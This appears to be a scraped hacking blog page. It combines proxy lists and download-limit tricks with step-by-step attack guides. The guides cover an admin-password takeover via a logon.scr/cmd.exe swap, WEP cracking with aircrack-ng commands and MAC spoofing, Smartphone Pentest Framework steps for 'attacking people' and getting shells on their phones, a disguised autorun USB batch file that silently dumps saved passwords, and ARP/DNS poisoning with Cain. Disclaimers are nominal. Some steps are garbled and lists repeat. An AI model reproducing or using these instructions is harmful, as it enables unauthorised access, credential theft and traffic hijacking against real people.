Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

List Of Free Proxy Servers

  •     HideMyAss – https://www.hidemyass.com/proxy
  •     Proxify – http://proxify.com
  •     Ninja Clock – http://ninjacloak.com/
  •     AnonyMouse – http://anonymouse.org/
  •     AnonyMizer – http://www.anonymizer.com/
  •     kProxy – http://www.kproxy.com/
  •     BlewPass – http://www.blewpass.com/
  •     Zfreez – http://www.zendproxy.com/
  •     Vobas – http://www.vobas.com/
  •     Don’t Filter – http://www.dontfilter.us/
  •     Vtunnel – http://www.vtunnel.com/
  •     Proxy.org – http://www.proxy.org/
  •     New Ip Now – http://www.newipnow.com/
  •     WebProxy.net – http://www.webproxy.net/
  •     4everproxy – http://www.4everproxy.com/
  •     Unblock My Web – http://www.unblockmyweb.com/
  •     YouTube Unblock Proxy – http://www.youtubeunblockproxy.com
  •     Working Proxy – http://workingproxy.net
  •     Free Open Proxy – http://freeopenproxy.com
  •     Proxy 2014 – http://proxy2014.net
  •     Unblock YouTube Free – http://unblockyoutubefree.net
  •     Free YouTube – http://freeyoutube.net
  •     HideOnline Proxy – http://freeyoutube.net
  •     Rapid Proxy – http://rapidproxy.us
  •     Unblock YouTube Beat School – http://unblockyoutubeatschool.com
  •     Hiding Your Info – http://hidingyour.info
  •     Unblocker – http://unblocker.us
  •     Fast USA Proxy – http://fastusaproxy.com
  •     YouTube Free Proxy – http://youtubefreeproxy.net
  •     Proxyo – http://proxyo.info
  •     Quickproxy – http://quickproxy.co.uk
  •     Defilter – http://defilter.us
  •     Free Proxy Server – http://freeproxyserver.uk
  •     Free YouProxyTube – http://freeyouproxytube.com
  •     The Best Proxy – http://thebestproxy.info
  •     EXCS – http://ecxs.asia
  •     Just Proxy – http://justproxy.co.uk
  •     Proxy-2014 – http://proxy-2014.com
  •     VPN Browse – http://vpnbrowse.com
  •     ProxyOne – https://proxyone.net
  •     Web Proxy Free – http://webproxyfree.net
  •     Can’t Block This – http://cantblockthis.org
  •     Hide The Internet – http://hidetheinternet.com
  •     Greatest Free Proxy – http://greatestfreeproxy.com
  •     Proxay – http://www.proxay.co.uk
  •     ViewTube – http://viewyoutube.net
  •     PRO Unblock – http://pro-unblock.com
  •     HideMyTraxProxy – https://hidemytraxproxy.ca/
  •     Working Proxy – http://workingproxy.net
  •     Star Doll Proxy – http://stardollproxy.com
  •     HideMyAss UK – http://hidemyass.co.uk
  •     F4FP – http://f4fp.com
  •     TiaFun- http://tiafun.com
  •     Proxy 4 Freedom – http://proxy4freedom.com
  •     WebSurf Proxy – http://websurfproxy.me
  •     Fish Proxy – http://fishproxy.com
  •     DZ Hot – http://dzhot.us
  •     1FreeProxy – http://1freeproxy.pw
  •     Sporium – http://sporium.org
  •     Saoudi Proxy – http://saoudiproxy.info
  •     Proxy Browse – http://proxybrowse.info
  •     Proxy Internet – http://proxy-internet.info
  •     Jezus Loves This Proxy – http://jezuslovesthisproxy.info
  •     German Proxy – http://german-proxy.info
  •     CA Proxies – http://caproxies.info
  •     Proxy 2015 – http://proxy-2015.info
  •     FB Proxies – http://fbproxies.info
  •     America Proxy – http://americaproxy.info3
  •     PK Proxy – http://pkproxy.info
  •     Suede Proxy – http://suedeproxy.info
  •     To Proxy – http://toproxy.co
  •     PHProxy – http://phproxy.co
  •     London Proxy – http://londonproxy.eu
  •     Kr Proxy – http://krproxy.info
  •     Brazil Proxy – http://brazilproxy.info
  •     Canada Proxy – http://canadaproxy.info
  •     US Proxy – http://usproxies.info
  •     Spedo – http://spedo.co
  •     US Proxy – http://usproxy.nu
  •     You Liaoren – http://youliaoren.com
  •     Zacebook PK – http://zacebookpk.com
  •     Proxys – http://proxys.pw
  •     Justun Block IT – http://justunblockit.com
  •     Network ByPass – http://networkbypass.com
  •     Go Proxy – http://goproxy.asia
  •     Proxy This – http://proxythis.info
  •     Me Hide – http://mehide.asia
  •     Zalmos – http://zalmos.com
  •     kProxy Site – http://kproxysite.com
  •     Xite Now – http://xitenow.com
  •     Hidden Digital – http://hiddendigital.info
  •     Surf For Free – http://surf-for-free.com
  •     Intern Cloud – http://interncloud.info
  •     Singapore Proxy – http://singaporeproxy.nu
  •     PRO Intern – http://prointern.info
  •     Fast Time – http://fasttime.info
  •     Work Host – http://workhost.eu
  •     Travel VPN – http://travelvpn.info
  •     Proxy Call MeNames – http://proxmecallmenames.com
  •     Host App – http://hostapp.eu
  •     Unlock My Web – http://www.unblockmyweb.com/
  •     Proxy Site – https://www.proxysite.com/
  •     Free YouTube Proxy – http://www.youtubeunblockproxy.com/
  •     England Proxy – https://www.englandproxy.co.uk/
  •     Unblocker – https://www.unblocker.us/
  •     New IP Now – http://newipnow.com/
  •     Anonymouse – http://anonymouse.org/anonwww.html
  •     Hidden Digital Info – http://hiddendigital.info/
  •     Anony Mizer – https://www.anonymizer.com/ (14 days free trial)
  •     K Proxy – http://www.kproxy.com/
  •     Don’t Filter – http://dontfilter.us/
  •     Prox Me Call Me Names – http://www.proxmecallmenames.com/
  •     Change IP & Country – http://anonymizer.nntime.com/
  •     Ninja Cloak – http://ninjacloak.com/
  •     Quick Proxy – http://www.quickproxy.co.uk/
  •     Free Proxy Server – https://www.freeproxyserver.uk/
  •     Free You Proxy Tube – https://www.freeyouproxytube.com/
  •     The Best Proxy – https://www.thebestproxy.info/
  •     VPN Browse – http://vpnbrowse.com/
  •     Proxy 2014 – http://www.proxy-2014.com/
  •     Just Proxy – http://www.justproxy.co.uk/
  •     Extreme Proxy – https://www.extremeproxy.us/
  •     Fast School Proxy – https://www.fastschoolproxy.com/
  •     Remove Filters – https://www.removefilters.net/
  •     Monster Proxy – https://www.monsterproxy.co.uk/
  •     Hide Me Ass – https://www.hidemeass.co.uk/
  •     UK – Proxy – https://www.uk-proxy.org.uk/
  •     Proxy One – https://www.proxyone.net/
  •     Hide The Internet – https://www.hidetheinternet.com/
  •     Web Proxy Free – http://www.webproxyfree.net/
  •     World Cup Proxy – https://www.worldcupproxy.com/
  •     View Youtube – http://www.viewyoutube.net/
  •     Greatest Free Proxy – http://www.greatestfreeproxy.com/
  •     Mega Proxy – https://www.megaproxy.asia/
  •     Crazy Proxy – https://www.crazyproxy.org/
  •     IP Switcher – https://www.ipswitcher.us/
  •     Hide My Trax Proxy – https://hidemytraxproxy.ca/
  •     Stardoll Proxy – https://www.stardollproxy.com/
  •     Proxy 4 Freedom – http://proxy4freedom.com/
  •     Fish Proxy – http://fishproxy.com/
  •     See Proxy – http://seeproxy.me/
  •     Surf Proxy – http://surfproxy.co/
  •     Saoudi Proxy – http://saoudiproxy.info/
  •     Proxy Browse – http://proxybrowse.info/
  •     Proxy Internet – http://proxy-internet.info/
  •     Ca Proxies – http://caproxies.info/
  •     PK Proxy – http://pkproxy.info/
  •     Korea Proxy – http://krproxy.info/
  •     Brazil Proxy – http://brazilproxy.info/
  •     Canada Proxy – http://canadaproxy.info/
  •     King Surf Proxy – http://www.kingsurfproxy.com/
  •     US Proxies – http://usproxies.info/
  •     US Proxy – http://usproxy.nu/
  •     Zacebook – http://www.zacebookpk.com/
  •     Your Proxy – http://proxys.pw/
  •     Just Unblock It – https://www.justunblockit.com/
  •     Go Proxy – https://www.goproxy.asia/
  •     Network Bypass – https://www.networkbypass.com/
  •     Me Hide – https://www.mehide.asia/
  •     Proxy This – https://www.proxythis.info/
  •     PHP Proxy – http://www.phproxysite.com/
  •     Xite Now – http://xitenow.com/
  •     4Ever Proxy – http://4everproxy.com/
  •     KProxy Site – http://www.kproxysite.com/
  •     Surf for Free – http://surf-for-free.com/
  •     Intern Cloud – http://interncloud.info/
  •     Pro Intern – http://prointern.info/
  •     Singapore Proxy – http://singaporeproxy.nu/
  •     Work Host – http://workhost.eu/
  •     Travel VPN – http://travelvpn.info/
  •     Fast Time – http://fasttime.info/
  •     Rexoss – http://rexoss.com/
  •     Hide IP Proxy – https://hideipproxy.com/
  •     Host App – http://hostapp.eu/
  •     Proxy Pirate – https://www.proxypirate.co.uk/
  •     Pun Proxy – https://www.funproxy.net/
  •     Hide N Seek – http://www.hidenseek.org/
  •     Orange Proxy – https://www.orangeproxy.net/
  •     Free Publick Proxy – http://www.freepublicproxy.net/
  •     Push Proxy – https://www.pushproxy.com/
  •     Cool Proxy – https://www.coolproxy.biz/
  •     Proxy Tube – https://www.proxytube.info/
  •     Free Open Proxy – http://www.freeopenproxy.com/
  •     Hope Proxy – http://www.hopeproxy.com/
  •     Safe Proxy – https://www.safeproxysite.com/
  •     Private Surf – https://www.privatesurf.us/
  •     Europe Proxy – https://www.europeproxy.eu/
  •     Stealth Proxy – https://www.stealthproxy.co.uk/
  •     SSL Proxy – https://www.sslproxy.org.uk/
  •     Proxy Power – https://www.proxypower.co.uk/
  •     Web Surf – https://www.websurf.in/
  •     You Server – http://youserver.nu/


These are few working web server for proxy lists.

TRick <<>>

Now there is a simple trick to get rid of “All the slots Assigned to your Country are in use, Try again later” message.

* Go to Google Translate Tool
* Paste your Megaupload Link into Translate a web page box
* And Translate it from English to German.
* Hit the translate button and wait for the download page to load.
* And have fun !!
http://www.google.com/translate_t

----- ------------
You may also just try this site even to fool rapidshare more than megaupload.com.

Since it is a proxy site and hosted in USA.Megaupload never blocks them.

http://rapidsurf.proxymafia.org/
Triks<<>>>
Triks<<>>>
SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)

Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.


1. Go to the installation folder of acrobat reader
(C:program filesadobeacrobatreader.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast
and almost as good as notepad..
njoy♥♥♥♥


ftp link 4 adobe
ftp://ftp.adobe.com/

ftp 4 microsoft
ftp://ftp.microsoft.com/

Hi Friends…! After A Long Research… Today We Are Back With Most Wanted Wifi Hacking App, Which Will Really Amaze You With Its Features And Its  Capicity To Hack Wifi Network Effectively. And This App Will Helps You To Crack Any Wpa/Wps Enabled Wifi Networks. And Now Without Wasting Any More Time Come Let Us Go To Actuall Steps To Make Use Of This Wifi Tool.


Your Phone Must Be Rooted!!!


How To Hack Wifi Network Within Few Seconds:

  •      In Order To Hack Wifi Network You Need To Download “Wifi Wpa Wps Tester” App From  Here.
  •     Then Switch On Your Wifi Network And Scan For Available Wpa/Wps Wifi Network.
  •      As Soon As You Notice Available Wifi Network Then Open “Wifi Wpa Wps Tester” App.
  •      Now You Need To Click On Green Colour Reffresh Button And It Will Show You All Available Networks There.
  •      Now Just Click On [Green Colour Locked Key Locker] Symbol And Click On Try To Connect Network Option.

  •      Now It Will Show You Some Thing Like This:



 Ssid=”D-Link”
Psk=”password”
Key_mgmt=WPA-PSK
Priority=1
}
-
ssid=”D-Link”
key_mgmt=NONE
priority=6
}


  •     Now You Can See Password Of That Wifi In The Above Given Code, Which Is Coated Just Infront Of The Text Psk.
  •     For Ex: In The Above Case The Password Of The Wifi Network is password.
  •      Yipeee! You Are Done! You Have Hacked Wifi Network Sucessfully…..


 Proof:



Note:

  •     This Wifi Hacking Tool Will Only Work On wpa/wps Wifi Networks So Don’t Try With Just wpa Or Wpa2 Networks And Don’t Loose Your Hope.

  •     Even Though You Try Hack wpa/wps Networks Some Times It Failed To Hack And Its Due To You Are Too Far Away From Router Or Rourter Is Not Vunerable To Hack.
  •     Please Don’t Try This With Public Wifi Networks As It Was Illegal To Do That.
  •     This Post Is Just For Educational Purpose And To Retrive Your Own Password Of Your Own Wifi Network. And We Don’t Take Any Responsiblity Of Any Missuse Of This Tool Or This Article.



For More Best And Intresting Tweaks N Hacks Please Like Our Facebook Fan Page Or Subscribe To Our Website By Email To Get Email Alerts When New Article Is Posted.
 
If You Feel Any Difficulties Let Me Know In Comments.

Keep Visiting

I have already shown how to hack admin password in the basic way.If that doesn't work , you can try this new and advance method to hack administrator password.


>>Go to Start>Run , type cmd to open  command prompt
>>Enter this command cd\ to make directory to C:(default drive)

>>Now enter this command cd windows\system32  , to change the directory in command prompt to C:\windows\system32
>>Now type mkdir temphack to make a temporary directory for backup

Admin Hack

Admin Hack

>>Then , type copy logon.scr temphack\logon.scr  to copy logon.scr to temphack folder
>>Now type  copy cmd.exe temphack\cmd.exe copy cmd.exe to temphack folder
>>Then type del logon.scr to delete logon.scr . The backup of this file is in the folder temphack
>>Now type rename cmd.exe logon.scr to rename command prompt to logon screensaver

>>Now you get unprotected command prompt without logging in when windows loads logon screensaver at startup

>>When command prompt appears enter this command
net user admin infinitepc

>>Now you have hacked admin account and his/her password is set to infinitepc

>>After you have hacked admin you can restart and login with hacked administrator password

Note:

*Dont forget the spaces involved in all the above commands
*To restore this hack just go to temphack folder found in windows\system32 directory and copy those two files in that folder and paste those files in system32 folder(overwrite those files in this folder)
*The above hack works mostly  on FAT/FAT 32 systems not on NTFS systems

Common Methods used for Website Hacking
There are lots of methods that can be used to hack a website but most common ones are as follows:

1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack


Tools:
Acunetix:
'
Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

Nessus:

Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file security checks a client/server architecture with a GTK graphical interface etc.

Retina:


Retina is another Vulnerability Assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Metasploit Framework:

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network?

I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard.

How a wireless network works


A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients.

Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with. The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with  every NIC. For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range. Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is with the transmission of these packets that pose the largest security threat to any wireless network.

Wireless Encryption


The majority of home and small business networks are encrypted using the two most popular methods:

    WEP & WPA

WEP – Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively.  WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24 bit Initialization Vector (IV), and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)

WEP also comes in WEP2 and WEP+, which are not as common and still as vulnerable as the standard WEP encryption.

WPA – WiFi Protected Access – comes in WPA and WPA2, and was created to resolve several issues found in WEP. Both provide you with good security; however, they are not compatible with older devices and therefore not used as widely. WPA was designed to distribute different keys to each client; however, it is still widely used in a  (not as secure) pre-shared key (PSK) mode, in which every client has the same passphrase.

To fully utilize WPA, a user would need an 802.1x authentication server, which small businesses and typical home users simply cannot afford. WPA utilizes a 48 bit Initialization Vector (IV), twice the size of WEP, which combined with other WEP fixes, allows substantially greater security over WEP.

Packets and IVs



It’s all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security on your network. If that frightens you, start stringing wires throughout your home.

Every encrypted packet contains a 24 or 48 bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing.  The IV must be known to the client that received the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.

The problem with this method is that the Initialization Vectors are not always the same. In theory, if every IV was different, it would be nearly impossible to obtain the network key; this is not the case. WEP comes with a 24 bit IV; therefore, giving the encryption 16 million unique values that can be used. This may sound like a large number, but when it comes to busy network traffic, it’s not.

Every IV is not different; and this is where the issues arise. Network hackers know that all the keys used to encrypt packets are related by a known IV (since the user entered WEP part of the key is rarely changed); therefore, the only change in the key is 24 bits. Since the IV is randomly chosen, there is a 50% probability that the same IV will repeat after just 5,000 packets; this is known as a collision.

If a hacker knows the content of one packet, he can use the collision to view the contents of the other packet. If enough packets are collected with IV matches, your network’s security can be compromised.


The crack

Two of the most popular programs used for actually cracking the WEP key are Airsnort and Aircrack. Airsnort can be used with the .dump files that Kismet provides; and Aircrack can be used with the .cap files that Airodump provides.

Airsnort can be used on it’s own without any other software capturing packets; although, it has been reported to be extremely unstable in this state, and you should probably not chance loosing all your captured data. A better method would be to let Airsnort recover the encryption key from your Kismet .dump file. Kismet and Airsnort can run simultaneously.

For this demonstration, we’ll be using Aircrack. You can use Airodump to capture the packets, and Aircrack to crack the encryption key at the same time.

With Airodump running, open a new command window and type:
aircrack -f 3 -n 64 -q 3 george.cap

The -f switch followed by a number is the fudgefactor; which is a variable that the program uses to define how thoroughly it scans the .cap file. A larger number will give you a better chance of finding the key, but will usually take longer. The default is 2.

The -n switch followed by 64 represents that you are trying to crack a WEP 64 key. I knew because it was a setup; In the real world there is no way to determine what WEP key length a target access point is using. You may have to try both 64 and 128.

The -q 3 switch was used to display the progress of the software. It can be left out altogether to provide a faster crack; although, if you’ve obtained enough unique IVs, you should not be waiting more than a couple minutes.

A -m switch can be used, followed by a MAC address, to filter a specific AP’s usable packets; this would come in handy if you were collecting packets from multiple APs in Airodump.

Aircrack recovered my WEP 64 key within 1 minute using 76,000 unique IVs; the whole process took around 34 minutes.

The same experiment was repeated with WEP 128 and it took about 43 minutes. The reason it was not substantially longer is because I simply let Airplay replay more packets. Sometimes you can get lucky and capture an ARP Request packet within a few minutes; otherwise, it could take a couple hours.
                                                                 WI-FI HACKING TOOLS

I am going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi password using Ubuntu or any other Linux distribution:

Netcut:

Disconnect any wifi devices from network. Support windows OS . The driver and Install package has been upgrade. tested working under windows 7 both 32 bit and 64 bit OS. Its change MAC address on any adapter, including wireless. Details at How to change MAC. Also support Clone MAC address from any PC that NetCut monitored.
Whereas Wifikill use for Android applications to disable internet connections for a device on same network. Disconnect wifi connection and get full network on your device.

Download: Netcut or Wifikill

Aircrack-ng


Aircrack-ng (a fork of aircrack) is my main tool for cracking Wi-Fi passwords. It has a wireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Download: Aircrack-ng


Kismet

Kismet is a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any log-gable packets.
ismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system.

Download: Kismet

NetStumbler

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.

Download: NetStumbler

SWScanner
SWScanner is specifically designed to make the whole wardriving process a lot easier. It is also intended to manage many tasks related to wireless networking. SWScanner is compatible with NetStumbler files and can be integrated with GPS devices.
These are only three of the many wireless tools that can get you going in no time, so feel free to explore.

Download: SWScanner




Step 1:-

First Download Backtrack  from the following link:

http://www.backtrack-linux.org/

Step 2:-

Burn the iso image on CD and boot your laptop from CD drive

Step 3:-

Select the third boot option(VESA/KDE).

Step 4:-

Once in BT3, click the tiny black box in the lower left corner to load up a

 "Konsole" window.

Step 5:-

Type the following command

airmon-ng

Note down the interface name. In this example wifi0

Step 6:-

airmon-ng stop wifi0

Step 7:-

ifconfig wifi0 down

Step 8:-

macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:-

airmon-ng start wifi0

Step 10:-

airodump-ng wifi0

This will start populating Wifi networks. Press Ctrl + C to stop.

Check the network with WEP encryption.

Notedown BSSID, CH and ESSID somewhere in notepad or paper

Note that if the same BSSID is available in the second part with STATION associated with it,

means you some one is accessing that network and our task will be little easier.

If not than don’t worry we will still crack it.

Step 11:-
airodump-ng -c (channel) -w (file name)

Replace

(channel) with the CH which u had already n

(file name) with any name of your choice

(bssid) with the BSSID which u had already note

--bssid (bssid) wifi0

Note it

Leave this console as it is and start new konsole

Step 12:-

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0

If you don’t get Association Successful mesage then keep on trying until

you got success.

Step 13:-


aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0

Well if you don’t see ARP ACK and sent packets are not increasing or still 0

than it means no 1 is

accessing that network.But don’t worry you go an optional step,

Leave this console as it is and start new k

Step 14:-

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF

konsole

message than keep on trying until you get success

got an optional step

konsole

–b (bssid) –h 00:11:22:33:44:66 wfi0

Press y and enter

Now you will see that ARP and ACK packets in 2nd console are increasing fast

Keep this console as it is and start 4th console.

Step 15:-

aircrack-ng -b (bssid) (filename)-

Just wait and watch…..Backtrack will do rest of the work.

Hurray we got the key.

Done..!!

Requirements:

    1. Backtrack 5 r3 (using backtrack for this example as SPF is pre-installed), i recently posted a article, how to download, install and run backtrack 5 in windows.
    2. Portforwarding (if you are using this outside of your own network)
    3. Xampp for linux (guide to installing this will be in the tutorial)
    4. A phone (for example I will be using my Android Phone)

Step 1) Installing Xampp:

        First of all, go Here to get Xampp.
        Once xampp has finished downloading, go to your home directory and you should have a file called “download.php?xampp-linux-1.7.3a.tar.gz” rename it to something like “xampp.tar.gz“.
        In your terminal window run

tar xvfz xampp.tar.gz -C /opt

    Everything should be installed and you can find xampp in /opt/lampp/directory.



Step 2) Configuring Xampp:


Use
/opt/lampp/lampp start
/opt/lampp/lampp stop

To start and stop the Xampp service

    Once Xampp has started, go to “localhost” in your browser and select your language. Navigated to “Phpmyadmin” and create a new database called “framework”.
    Next add a new user by going to the “privileges” tab then “add a new user”.
    Use whatever username and password you want and select “local” from the hosts list.
    Make sure you “Check All” global privileges, then click go.
    Now delete the htdocs folder in /opt/lampp/


Step 3) Configuring SPF Files:
        Navigate to the SPF config file

/pentest/exploits/smartphone-pentest-framework/frameworkconsole/configand Replace

    Ip Address For Websrever – with your local/public ip.
    Ip Address TO Listn on for Shells – with your local/public ip.
    Ip Address of SQL Server 127.0.0.1 if Localhost – with 127.0.0.1
    Username of the MYSQL User to use – with the username you made in phpmyadmin
    Password of the MYSQL User to use – with the password of the user you set.




Step 4) Configuring SPF:


        Open up the smartphone-pentest-framework window by going to:

applications>backtrack>exploitation tools>wireless exploitation tools>gsm exploitation>Smartphone-pentest-framework.

    Select option 4 then select option 2.
    Input your phone number, then input a 7 digit control key to connect to your victims and then enter the path you want your app to located on your webserver (I will be using /). Now don’t expect anything to happen just yet, you need to configure your phone with SPF.
    Locate the file:



/pentest/exploits/smartphone-pentest-framework/FrameworkAndroidApp/bin/FrameworkAndroidApp.apk

    And move it over to your phone by uploading it to dropbox or just connecting your phone to your computer.
    Install it then open it up. Put in the details you filled out a minute ago in
    SPF and your ip the webserver is setup on and press setup.





Step 5) Attacking People:

        Open up smartphone-pentest-framework and select option 6 then pick between the direct download (just sends a text to the person from your phone with a direct download to the file) or client side shell (uses a browser exploit in android phones to give you shell access).
        If you select option 1 you must move the file

/pentest/exploits/smartphone-pentest-framework/AndroidAgent/bin/AndroidAgent.apk

    To your root directory.
    Once you get a victim, just open up smartphone-pentest-framework again, select option 1, fill in the details and you can then control the victim from your mobile phone.

Hi friends, today i am going to give small information about Gmail. I do not know whether you know this or not. But it’s my service to provide you the hacking and security details. Have you ever see the bottom of the gmail page? Hey wait, after reading this article go and visit. Now go ahead. You can see in the bottom of gmail like this:


It will show the last activity.  So you can come to know from which ip you login last time.  If you click the Details link.  It will show the detailed of session.  It will show List of Ip address you login.  Using this Detail you can come to know whether any other using your gmail ID or not.


If you suppose that find any other using your gmail or you are login any other system, Click the ” Sign out all other Session”.  This will sign out all other session from other computers.  Then change your password if you want.

How to Hack Wifi Password 2015
Here are the best wifi hacking tricks 2015 – How to Hack Wifi Password 2015 by backtrack 5 or Kali Linux then we are unable to help you.We are strictly bound by our terms and conditions. For security purpose we have written this post to aware you from hackers.


How to Hack Wifi Password 2015 – hacking those Wi-Fi passwords is your answer to temporary internet access. In this post i’m sharing easily hacking methods How to Hack Wifi Password and also sharing number of security tips to secure our wifi network from hackers.

How to Hack Wifi Password 2015


First we need to scan for available wireless networks. Theres this great tool for windows to do this.. called “NetStumbler” or “Kismet” for Windows and Linux and “KisMac” for Mac.
Blacktrack 5 or Kali Linux Tools are used to Hack Wifi Password


The two most common encryption types are:

1) WEP
2) WAP


WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas WAP is currently the most secure and best option to secure a wi-fi network..It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.


Here I’ll tell you how to Crack WEPTo crack WEP we will be using Live Linux distribution called BackTrack to crack WEP. BackTrack have lots of preinstalled softwares for this very purpose.

Hack Wifi Password using Kali Linux or Backtrack 5 and The tools we will be using are:
  •     Kismet – a wireless network detector
  •     airodump – captures packets from a wireless router
  •     aireplay – forges ARP requests
  •     aircrack – decrypts the WEP keys
Note :- All content are intended for Security Research Purpose & should not be used illegaly. We provides you chance to Create Something Best and More Stronger.

If your question is how to hack wifi password 2015 or how to hack wifi password 2015 by Kali Linux or backtrack 5 then we are unable to help you. We are strictly bound by our terms and conditions. For security purpose we have written this post to aware you from hackers.

Keep visiting

This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer. If you're looking for a super tiny, super discreet flash drive, we recommend SanDisk Cruzer Fit CZ33 64GB USB 2.0 Low-Profile Flash Drive- SDCZ33-064G-B35

     open notepad/wordpad

    type:

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

    save this as AUTORUN.inf
    open a new notepad/wordpad document

    type:

    start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start PasswordFox.exe /stext passwordfox.txt

    start OperaPassView.exe /stext OperaPassView.txt

    start ChromePass.exe /stext ChromePass.txt


    start Dialupass.exe /stext Dialupass.txt

    start netpass.exe /stext netpass.txt

    start WirelessKeyView.exe /stext WirelessKeyView.txt

    start BulletsPassView.exe /stext BulletsPassView.txt

    start VNCPassView.exe /stext VNCPassView.txt

    start OpenedFilesView.exe /stext OpenedFilesView.txt

    start ProduKey.exe /stext ProduKey.txt

    start USBDeview.exe /stext USBDeview.txt



    save this as LAUNCH.bat
    copy the autorun and launch file to your USB
    go to http://www.nirsoft.net/ and download the programs named in step 2
    extract the files you downloaded to your desktop and copy all the .exe files to your USB
    remove and re-insert your USB
    click on the option perform a virus scan
    (this is an exemple, if you want it to say something else go to the autorun file and change it ;) )
    go to my computer---> USB DRIVE and open it


    you will now see some text files, if you open them you will see usernames and passwords


    NOTICE: this only recovers passwords that have once been saved on your computer

First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. For example, http://www.example.com translates to208.77.188.166.


What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.
First This is the structure of the network :





1 , 2 and 3 are computers
1 is the computer being the gateway (could be a router) (172.128.254.1)
2 is the target computer (172.128.254.10)
3 is the attacker using cain

Note : IPs are just used for this tutorial and chosen randomly.
Our work is on computer number 3 :
1-After you install cain , open it and go to the sniffer tab
2-Click on configure and choose your adapter



3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)
4-Right click in the empty area and choose scan MAC addresses. We get the results above.
5-Click on the APR Tab



6-Click on the + sign in the toolbar to add a new ARP poison routing



7-choose the gateway which is 172.128.254.1 , in the next list you’ll get the IP of the computer 2 which is 172.128.254.10 and click ok



8-now click on the APR-DNS tab







9-click on the + sign


10-enter the web address that you want to spoof , (in this case when the user goes to facebook he’ll be redirected to myspace) click on resolve type the web address that you want to redirect the user to it, and click ok, and you’ll get the IP of the web address, then click ok



you'll get something like this:



11-now to make this work we have to enable APR poisoning , click on the icon next to the sniffer icon, and everything should work as we expect.

Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .
Imagine what you can do with this technique.

Keep Visiting


WhatsApp as is well known, is the most widely used Messaging Application used worldwide and they have a tremendous team for fixing various bugs in order to ensure the Privacy of it’s users. But it seem that WhatsApp team is ignoring some of the major security flaws in WhatsApp App for Android. WhatsApp at current, have many major Flaws like Spamming on WhatsApp, WhatsApp Crashing, WhatsApp Hacking and so on.



